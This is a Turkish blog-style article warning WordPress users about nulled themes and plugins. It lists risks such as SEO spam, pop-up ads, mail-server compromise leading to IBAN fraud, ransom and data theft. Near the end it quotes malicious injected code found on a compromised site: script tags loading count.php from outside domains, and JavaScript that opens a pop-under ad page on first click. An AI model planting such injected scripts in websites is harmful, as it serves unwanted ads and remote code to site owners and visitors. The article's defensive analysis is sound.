Bu konuyu alt başlıklar halinde açıklamak istiyorum.
WordPress Nedir?
Çoğunuzun bildiği üzere WordPress açık kaynaklı ve GPL lisanslı CMS*'dir.
*CMS: Açılımı Content Management System. Türkçe karşılığı İçerik Yönetim Sistemi, kısaltımı İYS.
WordPress NoCode akımı öncülerindendir. Yani kod bilmeden bir web sitesi yapabilir ve yayına alabilirsiniz. Bu web sitesi için bir tasarıma ihtiyacınız vardır. WordPress ekosisteminde buna tema olarak adlandırılıyor. WordPress ekosisteminde binlerce tema bulabilirsiniz. Bunlar ücretli veya ücretsiz olarak ikiye ayrılır. Yeni başlayanlar açık kaynak yazılımların ücretsiz olduğunu düşünerek hataya kapılabilir. Fakat bir yazılımın veya sistemin açık kaynak olması onun ücretsiz olacağı anlamına gelmez.
Nulled, Crack, ***** Tema Nedir?
Lisanslı bir yazılımın, lisans korumasının etkisiz hale getirilmesidir. İnternet arama motorlarında çok fazla nulled tema ve eklenti bulunabilir. Fakat bu tema ve eklentiler ne kadar güvenli? Kimse hayrına nulled tema, eklenti veya yazılım paylaşmaz arkadaşlar. İnternetin yaygınlaşması ile büyüyen Hack akımı "ücretsiz bilgi" veya "herkesin ulaşabileceği bilgi" olarak çıksa bile sonradan amaç para olmuştur.
Şu an bir nulled tema veya eklenti indirdiğinizi ve kullandığınızı varsayalım. Eğer programlama bilmiyorsanız içini açıp anlamayacaksınız. Bu yüzden indirdiğiniz dosyaların ne olduğunu asla bilmiyor olacaksınız. Sistem aynı lisanslı yazılım gibi çalıyor sanabilirsiniz zaten istenilen olay size panik yaratmamaktır. Çoğu zararlı nulled yazılımın amacı düzgün çalıştığını sanıp arka planda farklı işlemlerin dönmesini sağlayabilmektir. Peki bu arka planda çalışan işlemler nelerdir?
1- Sizin domainiz ile farklı indexlenme yaparak kendi sitelerini yönledirme yapabilirler.
Google arama motorunda alan adınızı aratınca tarihi eser veya viagra satış sayfaları indexlenmiş olabilir.
2- İstenmeyen reklam ve spamlar.
Kurumsal bir firma için bir web sitesi kurdunuz. Siteye girince +18 reklamlar çıkabilir. Bu vakalar başıma geldi. Siteye girdiğiniz zaman javaScript kodları ile cache kontorlü yapılıyor. Eğer siteye ilk defa giriyorsanız ve sitede herhangi bir noktaya tıklarsanız yeni sekme ile reklam sayfası açılıyor. Daha sonra saat başı sürekli spam reklamı yapılıyor.
3- Sunucuya sızıp e-mail sunucusuna sızabilirler.
Kurumsal firmalar e-mail üzerinden teklif ile çalışır ve bu tekliflerin 3.şahıslar tarafından okunmaması gerekmektedir. Yaşamış olduğum farklı bir vaka örneğidir. Metal sanayi üzerine iş yapan bir firma nulled tema kullandıkları için sistemleri ele geçirilmiş tabi bunun farkında değiller taki çinli bir firma ile anlaşıp para transferi yapacakları zamana kadar. Saldırganlar mail sunucularını farklı yönlendirip Çinli firmaya IBAN hesap bilgilerimiz değişmiştir diye mail atayırlar daha sonra Çinli firma telefon ile doğrulama yapmak isteyince durum ortaya çıktı.
4-Fidye
Siteniz şifrelenebilir ve fidye istenebilir. Bu pek rastlanan durum değildir. Genellikle yüksek statüdeki kişi ve firmalar için yapılır.
5-Siteniz Kara Listeye eklenebilir
Eğer arka planda zararlı yazılım tespit edilirse alan adınız veya ıp adresiniz kara listeye eklenir. Bu durum istenmeyen sonuçlara sebebiyet verir. Tüm seo gücünüzü bir anda kaybettiğinizi düşünün.
6-Veriler çalınabilir
Sistemdeki veriler sızabilir. Bunlar kullanıcı isimleri, şifreler, e-mail hesapları, e-mail içerikleri vb. önemli bilgilerinizdir.
Eminim bu başlıklar sonsuza kadar devam edebilir. Tabi bunların sadece nulled tema ve eklentiler için olduğunu düşünmeyin. Bir başka vaka örneğim ise şöyle :
Kullanıcı eski bir sistem kullandığı için eski versiyonlu ücretsiz bir eklentiye ihtiyacı var. Fakat eklentiyi yayınlayan firma ihtiyacı olan sürümün indirme linki kaldırmış çünkü artık desteklemiyor. Kullanıcı internetten arama yaparak istediği versiyondaki eklentiyi buluyor ve indirip kuruyor. Yaklaşık 2 hafta sonra google indexlerini kontrol ettiğimiz zaman yabancı bir site için farklı bir indexleme yaptığını tespit ediyoruz. Kodları incelediğimiz zaman wp-admin klasörün içersindeki dosyaların değiştiğini ve benzer isimlerde yeni .jpg ve png uzantılı resimlerin oluştuğunu gördük. wp-admin/images dosyasının içinde sistemin default resimleri ile benzer isimlere sahip farklı resimler vardı. Daha iyi anlaşılması için wheel.png diye bir resim var fakat zararlı yazılım sisteme ayrıca Wheel.png diye bir resim daha yüklüyor. Bu resimler aslında çalışmıyor. Saldırganlar html uzantılarını .png olarak değiştiriyor. Arka planda çalışan kod png uzantılı dosyayı html uzantısına çeviriyor daha sonra indexleme için gerekli işlemleri yapıyor. Google search console doğrulama kodunu bile yüklemişlerdi.
İstenmeyen reklam spam sistemi örnek client kodları:
Zafiyetin client tarafındaki görünür kodları HTML head etiketin içerisinde bulunmaktadır.
Head etiketindeki kod:
<linkrel='dns-prefetch' href='//www.dekernonline.nl' /><linkrel='dns-prefetch' href='//www.marycremin.com' /><linkrel='dns-prefetch' href='//magaliefonteneau.com' /> <script type='text/javascript' src='//www.dekernonline.nl/wp-content/count.php?s=7531575880767&ver=5.4.6'></script><script type='text/javascript' src='//magaliefonteneau.com/wp-content/count.php?s=7531575880767&ver=5.4.6'></script><script type='text/javascript' src='//www.marycremin.com/wp-content/count.php?s=7531575880767&ver=5.4.6'></script>Çağrılan JavaScript kodu:
localStorage.setItem('test', 'testValue'); if ((localStorage.getItem('test') !== null) && (localStorage.getItem('click') == null)){ var click_r = false; document.addEventListener("click", function(){ if(click_r == false){ var date = new Date();date.setTime(date.getTime()+(100*24*60*60*1 000)); document.cookie = "a=a; expires=" + date.toGMTString(); localStorage.setItem('click', 'click'); window.open("http://hydtoca.tk/index/?7531575880767"); click_r = true; } }); }
Son olarak bilmediğiniz yerlerden ücretsiz yazılım, nulled, crack ve ***** yazılım asla kullanmayın. Bu anlattıklarım sadece güvenlik içindir. Ayrıca bu konun etik olmama durumu vardır.
.
